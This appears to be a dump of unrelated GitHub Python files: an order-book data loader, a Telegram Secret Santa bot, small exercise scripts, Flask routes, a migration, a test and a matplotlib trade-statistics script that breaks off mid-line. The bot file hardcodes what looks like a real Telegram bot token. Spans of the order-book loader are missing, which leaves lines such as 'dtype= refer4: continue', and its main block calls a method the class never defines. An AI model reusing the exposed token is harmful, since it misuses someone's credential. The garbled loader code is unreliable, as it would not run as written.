correct the mistake of deleting time stamps for calculating mean mid price;\n\n'''\n\nTRAIN_INPUTS_FILENAME = 'train_inputs.npy'\nTRAIN_LABELS_FILENAME = 'train_labels.npy'\nDEV_INPUTS_FILENAME = 'dev_inputs.npy'\nDEV_LABELS_FILENAME = 'dev_labels.npy'\nTEST_INPUTS_FILENAME = 'test_inputs.npy'\nTEST_LABELS_FILENAME = 'test_labels.npy'\n\nTRAIN_MEANS_FILENAME = 'train_means.npy'\nTRAIN_STDDEVS_FILENAME = 'train_stddevs.npy'\nDEV_MEANS_FILENAME = 'dev_means.npy'\nDEV_STDDEVS_FILENAME = 'dev_stddevs.npy'\nTEST_MEANS_FILENAME = 'test_means.npy'\nTEST_STDDEVS_FILENAME = 'test_stddevs.npy'\n\nTRAIN_DATA_FILENAME = 'train_data.csv'\nTEST_DATA_FILENAME = 'test_data.csv'\n\nTRAIN_DATA_PRE_PROCESSED_FILENAME = 'train_preprocessed.npy'\nTEST_DATA_PRE_PROCESSED_FILENAME = 'test_preprocessed.npy'\nPRE_PROCESS_RECORD_FILENAME = 'preprocess.txt'\n\n\ndef _save_data (inputs, labels, full_path_dir, inputs_name, label_name):\n '''\n Save data into full_path_dir\n \n used in function `divide_data()`\n '''\n\n #arr_inputs = np.array(inputs, dtype=np.float32)\n #arr_labels = np.array(labels, dtype=np.float32)\n\n np.save(os.path.join (full_path_dir, inputs_name), inputs)\n np.save(os.path.join (full_path_dir, label_name), labels)\n\n\ndef _read_data (full_path_dir, inputs_name, labels_name):\n '''\n Read data from full_path_dir\n \n Returns:\n inputs, labels\n '''\n\n return np.load (os.path.join (full_path_dir, inputs_name)),\\\n np.load (os.path.join (full_path_dir, labels_name))\n\n\nclass OrderBook:\n\n '''\n Order book class, designed mainly for data input\n '''\n\n def __init__ (self, batch_size, data_dir, \n num_inputs=10,\\\n num_labels=20,\\\n data_regenerate_flag=False):\n '''\n Initialization, open the files and set the arguments\n\n Args:\n - batch_size: int;\n - data_dir: string, directory of the data\n - data_regenerate_flag: bool, True if re-process data, False if use stored data\n '''\n\n self._batch_size = batch_size\n self.batch_ind = 0\n self._data_dir = data_dir\n self._num_inputs = num_inputs\n self._num_labels = num_labels\n self.num_features = None # will be later set after processing data\n\n # vars for training set\n self.train_inputs = None\n self.train_labels = None\n self.train_means = None\n self.train_stddevs = None\n\n # vars for dev set\n self.dev_inputs = None\n self.dev_labels = None\n self.dev_means = None\n self.dev_stddevs = None\n\n # vars for test set\n self.test_inputs = None\n self.test_labels = None\n self.test_means = None\n self.test_stddevs = None\n\n # var for recording index in data matrix\n self.index = {\n 'Date':1,\n 'Time':2,\n 'MidPrice':3,\n 'LastPrice':4,\n 'Volume':5,\n 'BidPrice1':6,\n 'BidVolume1':7,\n 'AskPrice1':8,\n 'AskVolume1':9,\n 'TimeStamp':10\n }\n \n if data_regenerate_flag or not os.path.exists (os.path.join (self._data_dir, TRAIN_INPUTS_FILENAME)):\n self.__data_process_procedure()\n\n self.train_inputs, self.train_labels, self.train_means, self.train_stddevs = \\\n self.__load_inputs_and_labels(os.path.join (self._data_dir, TRAIN_INPUTS_FILENAME),\\\n os.path.join (self._data_dir, TRAIN_LABELS_FILENAME),\\\n os.path.join (self._data_dir, TRAIN_MEANS_FILENAME),\\\n os.path.join (self._data_dir, TRAIN_STDDEVS_FILENAME))\n\n self.num_features = self.train_inputs.shape[2]\n\n\n\n\n @property\n def batch_size (self):\n return self._batch_size\n\n \n @batch_size.setter\n def batch_size (self, value):\n self._batch_size = value\n\n \n @property\n def data_dir (self):\n return self._data_dir\n\n\n @data_dir.setter\n def data_dir (self, value):\n 
self._data_dir = value\n\n\n @property\n def num_samples (self):\n '''\n Number of training samples\n '''\n\n return self.train_inputs.shape[0]\n\n \n @property\n def num_batches (self):\n '''\n Maximum number of batches that can be provided in one epoch\n '''\n return int (self.num_samples / self.batch_size)\n\n\n\n def __data_process_procedure (self):\n '''\n Define the procedure of data processing\n\n Args:\n None\n\n Returns:\n None\n '''\n\n # train data\n print (\"Start processing training data\")\n print (\"Reading data matrix...\")\n data_matrix = \\\n self.__read_data_matrix (os.path.join (self._data_dir, TRAIN_DATA_FILENAME))\n print (\"Done\")\n print (\"Dividing data matrix into days...\")\n day_matrix_list = \\\n self.__divide_by_day (data_matrix)\n print (\"Done\")\n print (\"Generating samples...\")\n sample_inputs_list, sample_labels_list, base_index = \\\n self.__generate_samples (day_matrix_list)\n print (\"Done\")\n print (\"Normalizing samples...\")\n sample_inputs_list, sample_labels_list, mean_list, stddev_list = \\\n self.__sample_normalization (sample_inputs_list, sample_labels_list, base_index)\n print(\"Done\")\n print(\"Remove lastPrice feature...\")\n sample_inputs_list, sample_labels_list, mean_list, stddev_list = \\\n self.__remove_lastPrice(sample_inputs_list, sample_labels_list, base_index)\n print (\"Done\")\n print (\"Saving samples...\")\n train_inputs_path, train_labels_path, train_means_path, train_stddevs_path = \\\n self.__store_inputs_and_labels (sample_inputs_list, sample_labels_list, mean_list, stddev_list)\n print (\"Done\")\n print (\"Processing training data completed\")\n\n # test data\n print (\"Start procssing test data\")\n print (\"Reading data matrix...\")\n data_matrix = \\\n self.__read_data_matrix (os.path.join (self._data_dir, TEST_DATA_FILENAME))\n print (\"Done\")\n print (\"Parsing test data...\")\n test_inputs_list, base_index = \\\n self.__parse_test_data (data_matrix)\n print (\"Done\")\n print (\"Normalizing test inputs...\")\n meaningless_test_labels_list = np.zeros (shape=[len(test_inputs_list)]) # just fit the arguments of __sample_normalization\n test_inputs_list, meaningless_test_labels_list, mean_list, stddev_list = \\\n self.__sample_normalization (test_inputs_list, meaningless_test_labels_list, base_index)\n print (\"Done\")\n print (\"Saving test inputs...\")\n self.__store_test_inputs (test_inputs_list, mean_list, stddev_list)\n print (\"Done\")\n print (\"Procssing test data completed\")\n\n\n\n def __read_data_matrix(self, in_filename):\n '''\n Read the train data matrix\n\n Args:\n - in_filename: string, input file name;\n\n Returns:\n - data_matrix: 2-d np matrix, dtype= refer4:\n continue # remove the data not in transaction time\n line.append (timeStamp)\n data_matrix.append (line)\n \n in_f.close()\n\n data_matrix = np.asarray (data_matrix)\n print ('data matrix shape:', data_matrix.shape)\n \n return data_matrix\n\n\n\n def __divide_by_day (self, input_matrix):\n '''\n Divide train data by day and morning/afternoon\n\n Args:\n - input_matrix: 2-d np matrix, dtype= 1e-4:\n if show_error:\n print ('[validate error] input matrix timestamp error:')\n print (input_matrix)\n return False\n\n for i in range (self._num_labels):\n if np.abs (midprice_matrix[i, 0]) > 3.1:\n if show_error:\n print ('[validate error] mid price matrix crosses a day')\n print (midprice_matrix)\n return False\n\n return True\n\n\n\n def __divide_data (self, in_filename):\n '''\n [Discard]\n Divide data into training set, and dev set (9:1), 
**after pre-processing**\n \n Args:\n - in_filename: string, full path of pre-processed data file\n \n Returns:\n - None\n\n (Implementation specified for projects, can not be reused)\n '''\n \n input_size = 10\n output_avg_len = 20\n\n data_matrix = np.load (in_filename)\n \n # 1. generate inputs and lables from data_matrix\n inputs = []\n labels = []\n\n total_cnt = 0\n accepted_cnt = 0\n\n num_inputs = data_matrix.shape[0] - (input_size + output_avg_len) + 1\n\n # mean and stddev prepared for later calculation\n pre_mean_labels = self.pre_mean[1]\n pre_stddev_labels = self.pre_stddev[1]\n \n for i in range (num_inputs):\n # delete midprice from input features \n input_matrix = np.hstack ((data_matrix[i:(i+input_size), :1], \n data_matrix[i:(i+input_size), 2:]))\n total_cnt += 1\n \n input_matrix[0, 0] = 3.0\n midprice_matrix = data_matrix[i+input_size:i+input_size+output_avg_len, 1:2]\n midprice_timestamp_matrix = data_matrix[i+input_size:i+input_size+output_avg_len, :1]\n if (self.__validate_input (input_matrix, midprice_timestamp_matrix)):\n accepted_cnt += 1\n inputs.append (input_matrix[:, 1:])\n label_val = np.mean (midprice_matrix)\n labels.append ((label_val-pre_mean_labels)/pre_stddev_labels)\n\n assert len(inputs) == len(labels)\n print ('accepted train samples:', accepted_cnt, '/', total_cnt)\n\n # 2. divide train data and dev data\n indices = np.asarray(list (range(len(inputs))))\n np.random.shuffle (indices)\n\n train_data_bound = int (np.ceil(len(inputs) * 0.9))\n dev_data_bound = len (inputs)\n\n train_inputs = []\n train_labels = []\n dev_inputs = []\n dev_labels = []\n\n for i in indices[:train_data_bound]:\n train_inputs.append (inputs[i])\n train_labels.append (labels[i])\n\n for i in indices[train_data_bound:]:\n dev_inputs.append (inputs[i])\n dev_labels.append (labels[i])\n\n train_inputs = np.asarray (train_inputs)\n train_labels = np.asarray (train_labels)\n dev_inputs = np.asarray (dev_inputs)\n dev_labels = np.asarray (dev_labels)\n\n # 3. 
save train and dev data\n full_path_dir = os.path.dirname (in_filename)\n _save_data (train_inputs, train_labels, full_path_dir, TRAIN_INPUTS_FILENAME, TRAIN_LABELS_FILENAME)\n _save_data (dev_inputs, dev_labels, full_path_dir, DEV_INPUTS_FILENAME, DEV_LABELS_FILENAME)\n #_save_data (test_inputs, test_labels, full_path_dir, TEST_INPUTS_FILENAME, TEST_LABELS_FILENAME)\n\n\n\n \n def __read_test_data (self, in_filename):\n '''\n [Discard]\n Read and save test data set after pre-process test data\n\n Args:\n - in_filename: string, path of pre-processed test data.\n\n Returns:\n - None\n '''\n \n input_size = 10\n data_matrix = np.load (in_filename)\n\n num_inputs = data_matrix.shape[0] // input_size\n assert num_inputs * input_size == data_matrix.shape[0]\n\n inputs = []\n for i in range (num_inputs):\n input_matrix = np.hstack ((data_matrix[i*input_size:(i+1)*input_size, :1],\n data_matrix[i*input_size:(i+1)*input_size, 2:]))\n input_matrix[0, 0] = 3.0\n #assert self.__validate_input (input_matrix, show_error=True)\n inputs.append (input_matrix[:, 1:])\n\n full_path_dir = os.path.dirname (in_filename)\n _save_data (inputs, [], full_path_dir, TEST_INPUTS_FILENAME, TEST_LABELS_FILENAME)\n\n\n\n\n def next_batch (self):\n '''\n Get the next batch of the training set\n\n Returns:\n train_inputs_batch: a padded input batch, batch_size x max_len x n_input\n train_labels_batch: a padded label batch, batch_size x 1\n '''\n\n if self.train_inputs is None:\n self.train_inputs, self.train_labels = _read_data (self.data_dir, TRAIN_INPUTS_FILENAME, TRAIN_LABELS_FILENAME)\n\n assert self.batch_ind + self.batch_size <= len (self.train_inputs)\n\n train_batch_inputs = self.train_inputs[self.batch_ind: self.batch_ind + self.batch_size]\n train_batch_labels = self.train_labels[self.batch_ind: self.batch_ind + self.batch_size]\n\n self.batch_ind += self.batch_size\n\n return train_batch_inputs, train_batch_labels\n\n\n def reset_batch (self):\n '''\n Reset self.batch_ind for a new epoch\n '''\n\n self.batch_ind = 0\n\n\n def dev_set (self): \n '''\n Get the padded dev inputs and labels\n\n Returns:\n dev_inputs: a list of inputs (lists);\n dev_lables: a list of labels\n '''\n\n if self.dev_inputs is None:\n self.dev_inputs, self.dev_labels = _read_data (self.data_dir, DEV_INPUTS_FILENAME, DEV_LABELS_FILENAME)\n\n return self.dev_inputs, self.dev_labels\n\n\n def test_set (self):\n '''\n Get the test inputs, means and stddevs\n\n Returns:\n test_inputs: 3-d np array;\n test_means: 1-d np array;\n test_stddevs: 1-d np array;\n '''\n\n if self.test_inputs is None:\n self.test_inputs, self.test_means, self.test_stddevs = \\\n self.__load_test_inputs (os.path.join (self._data_dir, TEST_INPUTS_FILENAME),\\\n os.path.join (self._data_dir, TEST_MEANS_FILENAME),\\\n os.path.join (self._data_dir, TEST_STDDEVS_FILENAME))\n\n return self.test_inputs, self.test_means, self.test_stddevs\n\n\n\n\n\nif __name__ == \"__main__\":\n BASE_DIR = os.path.dirname (os.path.abspath(sys.argv[0]))\n #INPUT_FILENAME = 'train1.csv'\n PROJECT_DIR = os.path.dirname (BASE_DIR)\n DATA_DIR = os.path.join (PROJECT_DIR, 'data')\n\n order_book = OrderBook (2, DATA_DIR, data_regenerate_flag=True)\n \n print (order_book.num_batches)\n for i in range (10):\n inputs, labels, mean, stddev = order_book.next_batch_with_mean_and_stddev ()\n print (inputs)\n print (labels)\n print (mean)\n print (stddev)\n input ()\n\n #test_inputs, _ = order_book.test_set()\n #print 
(test_inputs.shape)\n\n","repo_name":"lunaryan/my_AI","sub_path":"data_util.py","file_name":"data_util.py","file_ext":"py","file_size_in_byte":29585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17396274358","text":"# - *- coding: utf- 8 - *-\nimport copy\nimport logging\nimport random\nfrom functools import wraps\n\nimport telegram\nfrom telegram.ext import Updater, CommandHandler\nfrom telegram.error import (\n TelegramError,\n Unauthorized,\n BadRequest,\n TimedOut,\n ChatMigrated,\n NetworkError,\n)\n\n\nrules_text = (\n \"Правила Секретного Санты: \\n\"\n + \"1. Санта Секретный - никому не говори, кто тебе выпал!\\n\"\n + \"2. Подарок должен быть не дороже 200 грн.\\n\"\n + \"3. Спрячь свой подарок в красный мешок (найдешь его под елкой).\\n\"\n + \"4. Санта придет к тебе только после боя курантов.\\n\"\n)\n\n\ndef send_typing_action(func):\n \"\"\"Sends typing action while processing func command.\"\"\"\n\n @wraps(func)\n def command_func(*args, **kwargs):\n bot, update = args\n bot.send_chat_action(\n chat_id=update.effective_message.chat_id, action=telegram.ChatAction.TYPING\n )\n return func(bot, update, **kwargs)\n\n return command_func\n\n\n@send_typing_action\ndef start(bot, update):\n if update.message.chat.type == \"group\":\n bot.send_message(\n chat_id=update.message.chat_id,\n text=\"Я тайный помощник Санты. Для того , чтобы магия произошла, \"\n \"кликни сюда -> @\" + str(bot.get_me()[\"username\"]) + \" и нажми старт!\",\n )\n bot.send_message(\n chat_id=update.message.chat_id,\n text=rules_text,\n parse_mode=telegram.ParseMode.HTML,\n )\n\n else:\n bot.send_message(\n chat_id=update.message.chat_id,\n text=\"Круто, мы не забудем о тебе. Переходи в общий чат и регистрируйся.\",\n )\n\n\n@send_typing_action\ndef rules(bot, update):\n bot.send_message(\n chat_id=update.message.chat_id,\n text=rules_text,\n parse_mode=telegram.ParseMode.HTML,\n )\n\n\npeople = []\npairs = dict()\n\n\n@send_typing_action\ndef register(bot, update):\n u = User(\n update.effective_user.id,\n update.effective_user.username,\n update.effective_user.first_name,\n update.effective_user.last_name,\n )\n if u not in people:\n # print(update.effective_user.id)\n print(update.effective_user.username)\n # print(update.effective_user.first_name)\n # print(update.effective_user.last_name)\n people.append(u)\n bot.send_message(\n update.effective_user.id, \"Ты добавлен в список Секретного Санты!\"\n )\n else:\n bot.send_message(\n update.effective_user.id,\n \"Ты уже добавлен в мой список. 
Жди когда волшебство произойдет\",\n )\n\n\ndef info(bot, update):\n for p in people:\n print(p.username)\n print(p.last_name)\n\n\nclass User:\n def __init__(self, user_id, username, first_name, last_name):\n self.user_id = user_id\n self.username = username\n self.first_name = first_name\n self.last_name = last_name\n\n def __hash__(self):\n return hash(self.user_id)\n\n def __eq__(self, other):\n return self.user_id == other.user_id\n\n\ndef secret_santa(names):\n my_list = names\n choose = copy.copy(my_list)\n result = []\n for i in my_list:\n names = copy.copy(my_list)\n names.pop(names.index(i))\n chosen = random.choice(list(set(choose) & (set(names))))\n result.append((i, chosen))\n choose.pop(choose.index(chosen))\n return result\n\n\ndef magic(bot, update):\n # try:\n if update.effective_user.username == \"yarikpavlin\":\n print(\"Length \" + str(len(people)))\n if len(people) == bot.get_chat_members_count(update.message.chat.id) - 1:\n for i in secret_santa(people):\n # i - array with pari of receiver and provider\n # i[0] - user which is going to make a present\n # i[1] - user which is going to take a present\n # If receiver has username, show his username\n if i[1].username is not None:\n print(i[1])\n bot.send_message(\n i[0].user_id,\n \"Ты должен подготовить подарок для @\" + str(i[1].username),\n )\n # Else, show just first name\n else:\n bot.send_message(\n i[0].user_id,\n \"Ты должен подготовить подарок для \" + str(i[1].first_name),\n )\n\n print(\"Gifts almost here\")\n bot.send_message(\n chat_id=update.message.chat_id,\n text=\"Супер! Каждый получил своего тайного санту! Остаеться ждать Нового Года!\",\n )\n else:\n print(\"Some later, now it's \")\n bot.send_message(\n update.effective_user.id, \"Some later, now it's \" + str(len(people))\n )\n else:\n print(\"You are not Santa's helper, I'm sorry \")\n bot.send_message(\n update.effective_user.id, \"You are not Santa's helper, I'm sorry \"\n )\n\n\n# except Exception as inst:\n# print(inst)\n# print(people)\n# print(secret_santa(people))\n\n\ndef error_callback(bot, update, error):\n try:\n raise error\n except Unauthorized:\n print(error)\n # remove update.message.chat_id from conversation list\n except BadRequest:\n print(error)\n # handle malformed requests - read more below!\n except TimedOut:\n print(error)\n # handle slow connection problems\n except NetworkError:\n print(error)\n # handle other connection problems\n except ChatMigrated as e:\n print(error)\n # the chat_id of a group has changed, use e.new_chat_id instead\n except TelegramError:\n print(error)\n # handle all other telegram related errors\n\n\ndef main():\n logging.basicConfig(\n format=\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\",\n level=logging.INFO,\n )\n logger = logging.getLogger(__name__)\n # Create Updater object and attach dispatcher to it\n updater = Updater(token=\"673782777:AAEmRHnnJVe5npGALLSUquytHaRlQ-TfPh8\")\n dispatcher = updater.dispatcher\n print(\"Bot started\")\n\n # Add command handler to dispatcher\n start_handler = CommandHandler(\"start\", start)\n register_handler = CommandHandler(\"register\", register)\n info_handler = CommandHandler(\"info\", info)\n rules_handler = CommandHandler(\"rules\", rules)\n magic_handler = CommandHandler(\"magic\", magic)\n\n dispatcher.add_handler(start_handler)\n dispatcher.add_handler(register_handler)\n dispatcher.add_handler(info_handler)\n dispatcher.add_handler(rules_handler)\n dispatcher.add_handler(magic_handler)\n dispatcher.add_error_handler(error_callback)\n\n # 
Start the bot\n updater.start_polling()\n\n # Run the bot until you press Ctrl-C\n updater.idle()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yarikpavlin/secret-santa-prototype","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":7393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31179775138","text":"n = int(input())\r\n\r\narr = list(map(int, input().split()))\r\n\r\narr = [-1] + arr\r\n\r\nm = int(input())\r\n\r\nstu = []\r\n\r\n\r\ndef male(num):\r\n for i in range(1, n+1):\r\n if i % num == 0:\r\n if arr[i] == 1:\r\n arr[i] = 0\r\n else:\r\n arr[i] = 1\r\n\r\n\r\ndef female(num):\r\n if arr[num] == 1:\r\n arr[num] = 0\r\n else:\r\n arr[num] = 1\r\n\r\n left = num - 1\r\n right = num + 1\r\n\r\n while left > 0 and right <= n:\r\n if arr[left] == arr[right]:\r\n if arr[left] == 1:\r\n arr[left] = 0\r\n arr[right] = 0\r\n else:\r\n arr[left] = 1\r\n arr[right] = 1\r\n\r\n left -= 1\r\n right += 1\r\n else:\r\n break\r\n\r\n\r\nfor i in range(m):\r\n sex, num = map(int, input().split())\r\n\r\n if sex == 1:\r\n male(num)\r\n else:\r\n female(num)\r\n\r\n\r\nfor i in range(1, len(arr)):\r\n if i > 0 and i % 20 == 0:\r\n print(arr[i])\r\n else:\r\n print(arr[i], end=' ')\r\n","repo_name":"junheeLee96/algorithm","sub_path":"백준/Silver/1244. 스위치 켜고 끄기/스위치 켜고 끄기.py","file_name":"스위치 켜고 끄기.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"38584344458","text":"#Format input names, given as strings, as follows\r\n#Sample\r\n#Input Output\r\n#Aryadev Aryadev\r\n#Rajsekhar Basu R. Basu\r\n#Nabaneeta Dev Sen N. D. Sen\r\n#Dawlat Wazir Bahram Khan D. W. B. Khan\r\n\r\n\r\n\r\nstr=input(\"Enter your full name:\")\r\nli=str.split() #split function is use to convert a string into a list\r\nn=len(li)-1 #len function is use to find thelength of the list\r\nfor i in range(0,n):\r\n word=li[i] #in the word variable we store the element of the list\r\n print(word[0:1],end=\"\") #using string slicing we print the first letter of the each element of the list without the last element\r\n print(\". \",end=\"\")\r\nprint(li[n]) #print the last element of the list\r\n\r\n#set1\r\n#Enter your full name:Rajsekhar Basu\r\n#R. Basu\r\n\r\n#set2\r\n#Enter your full name:Dawlat Wazir Bahram Khan\r\n#D. W. B. 
Khan\r\n\r\n","repo_name":"Avishikta2312/Python-Assignment","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74843295209","text":"import json\n\nfrom flask import Blueprint, request\nfrom controllers import main_controller\n\npage = Blueprint('main', __name__)\n\n\n@page.route('/', methods=['GET'])\ndef index():\n return main_controller.main_get()\n\n\n@page.route('/get_data/', methods=['GET'], defaults={'uid': None})\n@page.route('/get_data/', methods=['GET'])\ndef get_data(uid):\n\n if uid is not None:\n with open(f'static/output/audio_{uid}.json', 'r') as f:\n data = json.load(f)\n main_controller.remove_files(uid, is_output=True)\n return data\n\n main_controller.remove_files(uid, is_output=True)\n\n return []\n\n\n@page.route('/example/', methods=['GET'])\ndef example_get():\n return main_controller.example_get()\n\n\n@page.route('/model', methods=['POST'])\ndef model_post():\n data = request.get_json()\n\n keys = ['audio', 'sample_rate']\n\n for key in keys:\n if key not in data:\n return {'status': 'error', 'message': f'{key} not in request'}\n\n return main_controller.model_post(data['audio'], data['sample_rate'])\n","repo_name":"Berkay-23/diarizationAPI","sub_path":"routers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19923483584","text":"#Calculando o preço da viagem para 0.50 até 200km se passar disso 0.45\n\nnum = int(input('Digite a distância: '))\nif num <= 200:\n distancia = num * 0.50\n print('Nessa distância, ficará por: R$ {:.2f}'.format(distancia))\nelse:\n distancia2 = num * 0.45\n print('Nessa distância, ficará por: R$ {:.2f}'.format(distancia2))\n\n\n\n#Da pra fazer o IF/ELSE assim também: \n# num=distancia*0.50 if distancia <= 200 else distancia * 0.45 \n#gostei nao mas é isso ai gabriel do futuro, ta anotado.\n","repo_name":"gaxque/Codando-JR","sub_path":"Calcular-KM.py","file_name":"Calcular-KM.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35995819329","text":"\"\"\"empty message\n\nRevision ID: bcf853c67790\nRevises: f30cc5d13b95\nCreate Date: 2021-08-03 19:26:35.440576\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'bcf853c67790'\ndown_revision = 'f30cc5d13b95'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint('districts_name_key', 'districts', type_='unique')\n op.add_column('judgments', sa.Column(\n 'court_order_number', sa.Integer(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('judgments', 'court_order_number')\n op.create_unique_constraint('districts_name_key', 'districts', ['name'])\n # ### end Alembic commands ###\n","repo_name":"red-door-collective/eviction-tracker","sub_path":"migrations/versions/bcf853c67790_.py","file_name":"bcf853c67790_.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"27201657882","text":"import pytest\nfrom src.createcompendia.geneprotein import build_compendium\nimport os\n\ndef test_gp():\n here=os.path.abspath(os.path.dirname(__file__))\n gene_compendium = os.path.join(here,'testdata','gptest_Gene.txt')\n protein_compendium = os.path.join(here,'testdata','gptest_Protein.txt')\n geneprotein_concord = os.path.join(here,'testdata','gp_UniProtNCBI.txt')\n outfile = os.path.join(here,'testdata','gp_output.txt')\n build_compendium(gene_compendium, protein_compendium, geneprotein_concord, outfile)\n with open(outfile,'r') as inf:\n x = inf.read()\n assert len(x) > 0\n print(x)\n","repo_name":"TranslatorSRI/Babel","sub_path":"tests/test_geneproteiny.py","file_name":"test_geneproteiny.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"10060240818","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n\n#opening the file\n\ndf1 = pd.read_excel('India_Imports_2011-12_And_2012-13.xls')\t#reading import file\n\ndf2 = pd.read_excel('India_Exports_2011-12_And_2012-13.xls')\t#reading export file\n\nwriter=open('table.tex','w')\n\n#top five import and export destination by total import and export (based on value)\n\n\nop1=df1.groupby('Country').agg({'Value-INR-2011-12':'sum'})\t\t#grouping sum of values of ech country\n\nop2=df2.groupby('Country').agg({'Value-INR-2011-12':'sum'})\n\n\nop1=op1.reset_index()\nop2=op2.reset_index()\n\nop1=op1.nlargest(5, 'Value-INR-2011-12' )\t\t#extraction top 5 values from the results\nop2=op2.nlargest(5, 'Value-INR-2011-12' )\n\n\n\n#for import\ntotal=df1['Value-INR-2011-12'].sum()\nsum1=op1['Value-INR-2011-12'].sum()\n\nother=total-sum1\t\t\t\t#calculating sum of other countries\nop1.loc[5]=['Others',other]\n\nslices=op1['Value-INR-2011-12']\n\ncountry=op1['Country']\n\nplt.pie(slices, labels=country)\n\n\nplt.title('Top 5 Country pie chart for import of year 2011-12')\n\n\nplt.savefig('image1.jpg', bbox_inches='tight')\nplt.clf()\n\n#for export\n\ntotal=df2['Value-INR-2011-12'].sum()\nsum2=op2['Value-INR-2011-12'].sum()\n\nother=total-sum2\t\t\t\t#calculating sum of other countries\nop2.loc[5]=['Others',other]\n\nslices=op2['Value-INR-2011-12']\n\ncountry=op2['Country']\n\nplt.pie(slices, labels=country)\n\n\nplt.title('Top 5 Country pie chart for export of year 2011-12')\n\n\nplt.savefig('image2.jpg', bbox_inches='tight')\nplt.clf()\n\n\n#bar chart for top 5 commodity\ncom1=df1.groupby('Commodity').agg({'Value-INR-2011-12':'sum'})\t\t\t\t#grouping sum of values of ech country\n\ncom2=df2.groupby('Commodity').agg({'Value-INR-2011-12':'sum'})\n\ncom1=com1.reset_index()\t\t\t\t\t\t#resettin index of both\ncom2=com2.reset_index()\n\ncom1=com1.nlargest(5, 'Value-INR-2011-12' )\t\t\t#returning commodities with top 5 values\ncom2=com2.nlargest(5, 'Value-INR-2011-12' )\n\ncom1=com1.reset_index()\t\t\t\t\t\t#resettin index of both\ncom2=com2.reset_index()\n\n#for import\n\nx=com1.index\ny=com1['Value-INR-2011-12']\n\n\n\nplt.bar(x,y, label='bar1', 
color='r')\nplt.xticks(x, com1['Commodity'],rotation='vertical')\nplt.title('Import bar chart of commodity of year 2011-12')\n\nplt.xlabel('Commodity')\nplt.ylabel('Value-INR-2011-12')\nplt.savefig('image3.jpg', bbox_inches='tight')\nplt.clf()\n\n#for export\nx=com2.index\ny=com2['Value-INR-2011-12']\n\n\n\nplt.bar(x,y, label='bar1', color='c')\nplt.xticks(x, com2['Commodity'],rotation='vertical')\nplt.title('Export bar chart of commodity of year 2011-12')\n\nplt.xlabel('Commodity')\nplt.ylabel('Value-INR-2011-12')\nplt.savefig('image4.jpg', bbox_inches='tight')\nplt.clf()\n\n\n#linegraph of 'TEA' between quantity and value , plotted for stat of each coountry\n\ntea1=df1[df1['Commodity']=='TEA']\ntea2=df2[df2['Commodity']=='TEA']\n\n#import\n\ntea1=tea1.sort_values(['Quantity-2011-12'])\n\nplt.plot(tea1['Quantity-2011-12'],tea1['Value-INR-2011-12'],label='Year 2011-12')\n\ntea1=tea1.sort_values(['Quantity-2012-13'])\n\nplt.plot(tea1['Quantity-2012-13'],tea1['Value-INR-2012-13'], label='Year 2012-13')\n\nplt.title('Import plot for TEA')\n\nplt.xlabel('quantity')\nplt.ylabel('value')\nplt.legend()\nplt.savefig('image5.jpg', bbox_inches='tight')\nplt.clf()\n\n#export\n\ntea2=tea2.sort_values(['Quantity-2011-12'])\n\nplt.plot(tea2['Quantity-2011-12'],tea2['Value-INR-2011-12'],label='Year 2011-12')\n\ntea2=tea2.sort_values(['Quantity-2012-13'])\n\nplt.plot(tea2['Quantity-2012-13'],tea2['Value-INR-2012-13'], label='Year 2012-13')\n\nplt.title('Export plot for TEA')\n\nplt.xlabel('quantity')\nplt.ylabel('value')\nplt.legend()\nplt.savefig('image6.jpg', bbox_inches='tight')\nplt.clf()\n\n\n#Scatterplot of 'RICE' between quantity and value , plotted for stat of each coountry\n\nrice1=df1[df1['Commodity']=='TEA']\nrice2=df2[df2['Commodity']=='TEA']\n\n#import\n\nrice1=rice1.sort_values(['Quantity-2011-12'])\n\nplt.scatter(rice1['Quantity-2011-12'],rice1['Value-INR-2011-12'],label='Year 2011-12' , marker='x',s=10)\n\nrice1=rice1.sort_values(['Quantity-2012-13'])\n\nplt.scatter(rice1['Quantity-2012-13'],rice1['Value-INR-2012-13'], label='Year 2012-13',marker='o',s=10)\n\nplt.title('Import scatter plot for RICE')\n\nplt.xlabel('quantity')\nplt.ylabel('value')\nplt.legend()\nplt.savefig('image7.jpg', bbox_inches='tight')\nplt.clf()\n\n#Export\n\nrice2=rice2.sort_values(['Quantity-2011-12'])\n\nplt.scatter(rice2['Quantity-2011-12'],rice2['Value-INR-2011-12'],label='Year 2011-12' , marker='x',s=10)\n\nrice2=rice2.sort_values(['Quantity-2012-13'])\n\nplt.scatter(rice2['Quantity-2012-13'],rice2['Value-INR-2012-13'], label='Year 2012-13',marker='o',s=10)\n\nplt.title('Export scatter plot for RICE')\n\nplt.xlabel('quantity')\nplt.ylabel('value')\nplt.legend()\nplt.savefig('image8.jpg', bbox_inches='tight')\nplt.clf()\n\n\n#histogram\ncom1=df1.groupby('Country').agg({'Value-INR-2011-12':'sum'})\t\t\t\t#grouping sum of values of ech 